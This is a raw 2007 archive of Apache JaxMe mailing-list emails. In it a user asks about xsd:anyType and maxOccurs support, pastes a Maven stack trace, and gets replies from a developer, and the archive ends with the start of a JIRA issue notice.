Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)"> <style> <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0cm; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline;} span.EmailStyle17 {mso-style-type:personal-compose; font-family:Arial; color:windowtext;} @page Section1 {size:595.3pt 841.9pt; margin:42.5pt 42.5pt 42.5pt 70.85pt;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DUK link=3Dblue vlink=3Dpurple> <div class=3DSection1> <p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US = style=3D'font-size: 10.0pt;font-family:Arial'>Hi,<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US = style=3D'font-size: 10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US = style=3D'font-size: 10.0pt;font-family:Arial'>I cannot understand, how I may have = xsd:anyType functionality in my schema.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US = style=3D'font-size: 10.0pt;font-family:Arial'>What I need to use for your compiler working = properly?<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US = style=3D'font-size: 10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US = style=3D'font-size: 10.0pt;font-family:Arial'>-<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US = style=3D'font-size: 10.0pt;font-family:Arial'>Denis<o:p></o:p></span></font></p> </div> </body> </html> ------=_NextPart_000_0101_01C7E966.620EEDB0-- From [email protected] Tue Aug 28 08:31:20 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87602 invoked from network); 28 Aug 2007 08:31:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Aug 2007 08:31:19 -0000 Received: (qmail 15351 invoked by uid 500); 28 Aug 2007 08:31:15 -0000 Delivered-To: [email protected] Received: (qmail 15331 invoked by uid 500); 28 Aug 2007 08:31:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 15322 invoked by uid 99); 28 Aug 2007 08:31:15 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Aug 2007 01:31:15 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,MISSING_MID,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO rock.ciklum.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Aug 2007 08:32:03 +0000 Received: from skywalker.ciklum.net ([161.129.204.104] helo=pcdbe) by rock.ciklum.net with esmtpsa (TLSv1:RC4-MD5:128) id 1IPwam-0001Q0-Us for [email protected]; Tue, 28 Aug 2007 11:38:33 +0300 From: "Denis Bessmertnyj" <[email protected]> To: <[email protected]> Subject: maxOccurs Date: Tue, 28 Aug 2007 11:30:48 +0300 Organization: Ciklum (Release) MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0108_01C7E966.E195B7D0" X-Mailer: Microsoft Office Outlook, Build 11.0.5510 Thread-Index: AcfpTTyeTDkxtaR7S66Yxmh60H9CowAAEzoA In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3138 X-SA-Do-Not-Run: Yes X-SA-Exim-Connect-IP: 161.129.204.104 X-SA-Exim-Mail-From: [email protected] X-SA-Exim-Scanned: No (on rock.ciklum.net); SAEximRunCond expanded to false X-Virus-Checked: Checked by ClamAV on apache.org Message-Id: <[email protected]> ------=_NextPart_000_0108_01C7E966.E195B7D0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit And why JaxMe doesn't want to work with maxOccurs="unbounded"? How I may have this functionality? _____ From: Denis Bessmertnyj [mailto:[email protected]] Sent: Tuesday, August 28, 2007 11:27 AM To: '[email protected]' Subject: anyType Hi, I cannot understand, how I may have xsd:anyType functionality in my schema. What I need to use for your compiler working properly? - Denis ------=_NextPart_000_0108_01C7E966.E195B7D0 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:v=3D"urn:schemas-microsoft-com:vml" = xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <meta http-equiv=3DContent-Type content=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)"> <!--[if !mso]> <style> v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} </style> <![endif]--> <style> <!-- /* Font Definitions */ @font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0cm; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline;} span.EmailStyle17 {mso-style-type:personal; font-family:Arial; color:windowtext;} span.EmailStyle18 {mso-style-type:personal-reply; font-family:Arial; color:navy;} @page Section1 {size:595.3pt 841.9pt; margin:42.5pt 42.5pt 42.5pt 70.85pt;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DUK link=3Dblue vlink=3Dpurple> <div class=3DSection1> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = lang=3DEN-US style=3D'font-size:10.0pt;font-family:Arial;color:navy'>And why JaxMe = doesn&#8217;t want to work with <b><span = style=3D'font-weight:bold'>maxOccurs=3D&quot;unbounded&quot;</span></b>?<= o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = lang=3DEN-US style=3D'font-size:10.0pt;font-family:Arial;color:navy'>How I may have = this functionality?<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = lang=3DEN-US style=3D'font-size:10.0pt;font-family:Arial;color:navy'><o:p>&nbsp;</o:p>= </span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = lang=3DEN-US style=3D'font-size:10.0pt;font-family:Arial;color:navy'><o:p>&nbsp;</o:p>= </span></font></p> <div> <div class=3DMsoNormal align=3Dcenter style=3D'text-align:center'><font = size=3D3 face=3D"Times New Roman"><span lang=3DEN-US style=3D'font-size:12.0pt'> <hr size=3D2 width=3D"100%" align=3Dcenter tabindex=3D-1> </span></font></div> <p class=3DMsoNormal><b><font size=3D2 face=3DTahoma><span lang=3DEN-US style=3D'font-size:10.0pt;font-family:Tahoma;font-weight:bold'>From:</spa= n></font></b><font size=3D2 face=3DTahoma><span lang=3DEN-US = style=3D'font-size:10.0pt;font-family:Tahoma'> Denis Bessmertnyj [mailto:[email protected]] <br> <b><span style=3D'font-weight:bold'>Sent:</span></b> Tuesday, August 28, = 2007 11:27 AM<br> <b><span style=3D'font-weight:bold'>To:</span></b> = '[email protected]'<br> <b><span style=3D'font-weight:bold'>Subject:</span></b> = anyType</span></font><span lang=3DEN-US><o:p></o:p></span></p> </div> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US = style=3D'font-size: 10.0pt;font-family:Arial'>Hi,<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US = style=3D'font-size: 10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US = style=3D'font-size: 10.0pt;font-family:Arial'>I cannot understand, how I may have = xsd:anyType functionality in my schema.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US = style=3D'font-size: 10.0pt;font-family:Arial'>What I need to use for your compiler working properly?<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US = style=3D'font-size: 10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US = style=3D'font-size: 10.0pt;font-family:Arial'>-<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US = style=3D'font-size: 10.0pt;font-family:Arial'>Denis<o:p></o:p></span></font></p> </div> </body> </html> ------=_NextPart_000_0108_01C7E966.E195B7D0-- From [email protected] Tue Aug 28 08:33:21 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88301 invoked from network); 28 Aug 2007 08:33:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Aug 2007 08:33:20 -0000 Received: (qmail 20614 invoked by uid 500); 28 Aug 2007 08:33:16 -0000 Delivered-To: [email protected] Received: (qmail 20597 invoked by uid 500); 28 Aug 2007 08:33:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 20588 invoked by uid 99); 28 Aug 2007 08:33:16 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Aug 2007 01:33:16 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mu-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Aug 2007 08:33:10 +0000 Received: by mu-out-0910.google.com with SMTP id w1so2033776mue for <[email protected]>; Tue, 28 Aug 2007 01:32:48 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=Q6HwUgsovqGWVHjHMMJDwATu591ocbbNoX7bY2jFyKrz6nqBYL3XSQ9I1YT1EfYgLkiu4M4MJXgtBc7JyEORzNS+VBTe0Fz8OrypBS5fiPckLYb3LhEPSPh2Xe3cN7STt35PEM/krrouWWBK295pDutunQwk/hOlsypb6k/q+ts= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=ZXxFUzYlaF5sgIVRhIgkDeUL3VFXXFclAqvHZK7Q708a2T14+HyMRUiJ2JgjxncVUIFnihzMkuyaEQpeSOydqwmXoeY8K2SqO+iGSWFcih3qgM05mDbzd5FdfESGjsnq0ZhiGmnI84lZ/7B8neOzUBxZmh3VH+6f4ZFuhgLdRz4= Received: by 161.129.204.104 with SMTP id e8mr5606766fgb.1188289968712; Tue, 28 Aug 2007 01:32:48 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 28 Aug 2007 01:32:48 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 28 Aug 2007 10:32:48 +0200 From: "Jochen Wiedmann" <[email protected]> To: "Denis Bessmertnyj" <[email protected]> Subject: Re: maxOccurs Cc: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 8/28/07, Denis Bessmertnyj <[email protected]> wrote: > And why JaxMe doesn't want to work with maxOccurs="unbounded"? Look into the "examples" folder. It contains schemata with maxOccurs="unbounded", that work very well. -- "Besides, manipulating elections is under penalty of law, resulting in a preventative effect against manipulating elections. The german government justifying the use of electronic voting machines and obviously believing that we don't need a police, because all illegal actions are forbidden. http://dip.bundestag.de/btd/16/051/1605194.pdf --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Aug 28 08:38:46 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90573 invoked from network); 28 Aug 2007 08:38:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Aug 2007 08:38:45 -0000 Received: (qmail 28890 invoked by uid 500); 28 Aug 2007 08:38:40 -0000 Delivered-To: [email protected] Received: (qmail 28866 invoked by uid 500); 28 Aug 2007 08:38:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 28857 invoked by uid 99); 28 Aug 2007 08:38:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Aug 2007 01:38:40 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=MISSING_MID,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO rock.ciklum.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Aug 2007 08:39:27 +0000 Received: from skywalker.ciklum.net ([161.129.204.104] helo=pcdbe) by rock.ciklum.net with esmtpsa (TLSv1:RC4-MD5:128) id 1IPwhw-0001xa-MF; Tue, 28 Aug 2007 11:45:56 +0300 From: "Denis Bessmertnyj" <[email protected]> To: "'Jochen Wiedmann'" <[email protected]> Cc: <[email protected]> Subject: RE: anyType Date: Tue, 28 Aug 2007 11:38:11 +0300 Organization: Ciklum (Release) MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Mailer: Microsoft Office Outlook, Build 11.0.5510 Thread-Index: AcfpTv6BlJ5yvu9WTZODU//U/TpZMAAAJwjA In-Reply-To: <[email protected]> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3138 X-SA-Do-Not-Run: Yes X-SA-Exim-Connect-IP: 161.129.204.104 X-SA-Exim-Mail-From: [email protected] X-SA-Exim-Scanned: No (on rock.ciklum.net); SAEximRunCond expanded to false X-Virus-Checked: Checked by ClamAV on apache.org Message-Id: <[email protected]> This is very, very BAD. And how I may have this kind of functionality? Do you know other methods or jaxb plugins for maven? - Denis -----Original Message----- From: Jochen Wiedmann [mailto:[email protected]] Sent: Tuesday, August 28, 2007 11:32 AM To: Denis Bessmertnyj Subject: Re: anyType On 8/28/07, Denis Bessmertnyj <[email protected]> wrote: > I cannot understand, how I may have xsd:anyType functionality in my schema. Because it is unsupported by JaxMe. -- "Besides, manipulating elections is under penalty of law, resulting in a preventative effect against manipulating elections. The german government justifying the use of electronic voting machines and obviously believing that we don't need a police, because all illegal actions are forbidden. http://dip.bundestag.de/btd/16/051/1605194.pdf --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Aug 28 08:47:07 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92693 invoked from network); 28 Aug 2007 08:47:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Aug 2007 08:47:06 -0000 Received: (qmail 35238 invoked by uid 500); 28 Aug 2007 08:47:02 -0000 Delivered-To: [email protected] Received: (qmail 35134 invoked by uid 500); 28 Aug 2007 08:47:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 35125 invoked by uid 99); 28 Aug 2007 08:47:02 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Aug 2007 01:47:02 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=MISSING_MID,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO rock.ciklum.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Aug 2007 08:46:55 +0000 Received: from skywalker.ciklum.net ([161.129.204.104] helo=pcdbe) by rock.ciklum.net with esmtpsa (TLSv1:RC4-MD5:128) id 1IPwq2-0002Xt-E1; Tue, 28 Aug 2007 11:54:18 +0300 From: "Denis Bessmertnyj" <[email protected]> To: "'Jochen Wiedmann'" <[email protected]> Cc: <[email protected]> Subject: RE: maxOccurs Date: Tue, 28 Aug 2007 11:46:33 +0300 Organization: Ciklum (Release) MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Mailer: Microsoft Office Outlook, Build 11.0.5510 Thread-Index: AcfpTy9iwdOZmYpDQ/iQn3UblfY88gAAIUkA In-Reply-To: <[email protected]> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3138 X-SA-Do-Not-Run: Yes X-SA-Exim-Connect-IP: 161.129.204.104 X-SA-Exim-Mail-From: [email protected] X-SA-Exim-Scanned: No (on rock.ciklum.net); SAEximRunCond expanded to false X-Virus-Checked: Checked by ClamAV on apache.org Message-Id: <[email protected]> Jochen, I have <xsd:sequence minOccurs="0" maxOccurs="unbounded"> <xsd:element name="titel" type="xsd:string" /> <xsd:element name="isbn" type="xsd:string" /> ..... And receive org.apache.maven.lifecycle.LifecycleExecutionException: Model groups with maxOccurs > 1 are not yet supported. at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoals(DefaultLife cycleExecutor.java:564) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoalWithLifecycle (DefaultLifecycleExecutor.java:480) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoal(DefaultLifec ycleExecutor.java:459) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoalAndHandleFail ures(DefaultLifecycleExecutor.java:311) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeTaskSegments(Defa ultLifecycleExecutor.java:278) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.execute(DefaultLifecycle Executor.java:143) at org.apache.maven.DefaultMaven.doExecute(DefaultMaven.java:334) at org.apache.maven.DefaultMaven.execute(DefaultMaven.java:125) at org.apache.maven.cli.MavenCli.main(MavenCli.java:272) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39 ) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl .java:25) at java.lang.reflect.Method.invoke(Method.java:597) at org.codehaus.classworlds.Launcher.launchEnhanced(Launcher.java:315) at org.codehaus.classworlds.Launcher.launch(Launcher.java:255) at org.codehaus.classworlds.Launcher.mainWithExitCode(Launcher.java:430) at org.codehaus.classworlds.Launcher.main(Launcher.java:375) Caused by: org.apache.maven.plugin.MojoExecutionException: Model groups with maxOccurs > 1 are not yet supported. at org.apache.ws.jaxme.maven.plugins.JaxMeGoal.runGenerator(JaxMeGoal.java:551) at org.apache.ws.jaxme.maven.plugins.JaxMeGoal.execute(JaxMeGoal.java:498) at org.apache.maven.plugin.DefaultPluginManager.executeMojo(DefaultPluginManage r.java:443) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoals(DefaultLife cycleExecutor.java:539) ... 16 more Caused by: org.xml.sax.SAXParseException: Model groups with maxOccurs > 1 are not yet supported. at org.apache.ws.jaxme.generator.sg.impl.JAXBComplexContentTypeSG.verify(JAXBCo mplexContentTypeSG.java:203) at org.apache.ws.jaxme.generator.sg.impl.JAXBComplexContentTypeSG.initialize(JA XBComplexContentTypeSG.java:118) at org.apache.ws.jaxme.generator.sg.impl.JAXBComplexContentTypeSG.getLocalEleme ntParticles(JAXBComplexContentTypeSG.java:124) at org.apache.ws.jaxme.generator.sg.impl.JAXBComplexContentTypeSG.getElementPar ticles(JAXBComplexContentTypeSG.java:130) at org.apache.ws.jaxme.generator.sg.impl.ComplexContentSGImpl.getElementParticl es(ComplexContentSGImpl.java:42) at org.apache.ws.jaxme.generator.sg.impl.ccsg.BeanGeneratingVisitor.startComple xContent(BeanGeneratingVisitor.java:99) at org.apache.ws.jaxme.generator.sg.impl.ccsg.ParticleWalker.walk(ParticleWalke r.java:36) at org.apache.ws.jaxme.generator.sg.impl.JAXBComplexTypeSG.createXMLBean(JAXBCo mplexTypeSG.java:206) at org.apache.ws.jaxme.generator.sg.impl.JAXBComplexTypeSG.getXMLInterface(JAXB ComplexTypeSG.java:182) at org.apache.ws.jaxme.generator.sg.impl.ComplexTypeSGImpl.getXMLInterface(Comp lexTypeSGImpl.java:46) at org.apache.ws.jaxme.generator.sg.impl.JAXBTypeSG.generate(JAXBTypeSG.java:25 2) at org.apache.ws.jaxme.generator.sg.impl.TypeSGImpl.generate(TypeSGImpl.java:92 ) at org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaSG.generate(JAXBSchemaSG.jav a:223) at org.apache.ws.jaxme.generator.sg.impl.SchemaSGImpl.generate(SchemaSGImpl.jav a:67) at org.apache.ws.jaxme.generator.impl.GeneratorImpl.generate(GeneratorImpl.java :148) at org.apache.ws.jaxme.generator.impl.GeneratorImpl.generate(GeneratorImpl.java :180) at org.apache.ws.jaxme.maven.plugins.JaxMeGoal.runGenerator(JaxMeGoal.java:549) ... 19 more -----Original Message----- From: Jochen Wiedmann [mailto:[email protected]] Sent: Tuesday, August 28, 2007 11:33 AM To: Denis Bessmertnyj Cc: [email protected] Subject: Re: maxOccurs On 8/28/07, Denis Bessmertnyj <[email protected]> wrote: > And why JaxMe doesn't want to work with maxOccurs="unbounded"? Look into the "examples" folder. It contains schemata with maxOccurs="unbounded", that work very well. -- "Besides, manipulating elections is under penalty of law, resulting in a preventative effect against manipulating elections. The german government justifying the use of electronic voting machines and obviously believing that we don't need a police, because all illegal actions are forbidden. http://dip.bundestag.de/btd/16/051/1605194.pdf --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Aug 28 09:08:53 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99860 invoked from network); 28 Aug 2007 09:08:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Aug 2007 09:08:51 -0000 Received: (qmail 62006 invoked by uid 500); 28 Aug 2007 09:08:47 -0000 Delivered-To: [email protected] Received: (qmail 61994 invoked by uid 500); 28 Aug 2007 09:08:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 61985 invoked by uid 99); 28 Aug 2007 09:08:47 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Aug 2007 02:08:47 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Aug 2007 09:08:41 +0000 Received: by nf-out-0910.google.com with SMTP id e27so1302593nfd for <[email protected]>; Tue, 28 Aug 2007 02:08:20 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=AzvKqx2kjya5qmT7cQYXm7yKOQI7uwRXIDo4EPu5w1EnBhp5XbkIaTUspRC1Oehj1fAAYOeVv6X6lD97l5l1xSdMQ3qIZOETVfHfQwq/yGAVpGIjAQi8EdKWAEuSzFJjEHzXUEOvuN445N0OjnALhRswp0B/X4jYaVbDGlqX930= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=Rl+Klg1/pDU0UEtPvX6rPrfIwNPtYzhth8dnPGs2YMjf7GINIpCdm2H2nrgpG0yB8eR8i4jCvtAL5Y0+LNmj71yY7pFJWY66SB8JNIOqjAqRqhoA0JAFBy6+Aqv54Z9BNW6vixbK26dz+1dvJMFPffOKpLo2d9qyhuf0bCXUhtQ= Received: by 161.129.204.104 with SMTP id x7mr5647773fgb.1188292099999; Tue, 28 Aug 2007 02:08:19 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 28 Aug 2007 02:08:19 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 28 Aug 2007 11:08:19 +0200 From: "Jochen Wiedmann" <[email protected]> To: "Denis Bessmertnyj" <[email protected]> Subject: Re: maxOccurs Cc: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 8/28/07, Denis Bessmertnyj <[email protected]> wrote: > I have > <xsd:sequence minOccurs="0" maxOccurs="unbounded"> > <xsd:element name="titel" type="xsd:string" /> > <xsd:element name="isbn" type="xsd:string" /> > > ..... > > And receive > > org.apache.maven.lifecycle.LifecycleExecutionException: Model groups with > maxOccurs > 1 are not yet supported. You asked for maxOccurs in general. As the error message indicates, maxOccurs="unbounded" is supported, except for model groups. Jochen -- "Besides, manipulating elections is under penalty of law, resulting in a preventative effect against manipulating elections. The german government justifying the use of electronic voting machines and obviously believing that we don't need a police, because all illegal actions are forbidden. http://dip.bundestag.de/btd/16/051/1605194.pdf --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Aug 29 22:12:54 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25212 invoked from network); 29 Aug 2007 22:12:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Aug 2007 22:12:53 -0000 Received: (qmail 25776 invoked by uid 500); 29 Aug 2007 22:12:49 -0000 Delivered-To: [email protected] Received: (qmail 25675 invoked by uid 500); 29 Aug 2007 22:12:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 25666 invoked by uid 99); 29 Aug 2007 22:12:48 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Aug 2007 15:12:48 -0700 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Aug 2007 22:12:52 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3B6F3714191 for <[email protected]>; Wed, 29 Aug 2007 15:12:32 -0700 (PDT) Message-ID: <27416760.1188425552241.JavaMail.jira@brutus> Date: Wed, 29 Aug 2007 15:12:32 -0700 (PDT) From: "Robert Eric Reeves (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (JAXME-94) startElement method larger than 64KB when using a large amount of complexType's MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org startElement method larger than 64KB when using a large amount of complexTy= pe's ---------------------------------------------------------------------------= ---- Key: JAXME-94 URL: https://issues.apache.org/jira/browse/JAXME-94 Project: JaxMe Issue Type: Improvement Components: JaxMe Core Affects Versions: 0.5, 0.6 Environment: All Reporter: Robert Eric Reeves 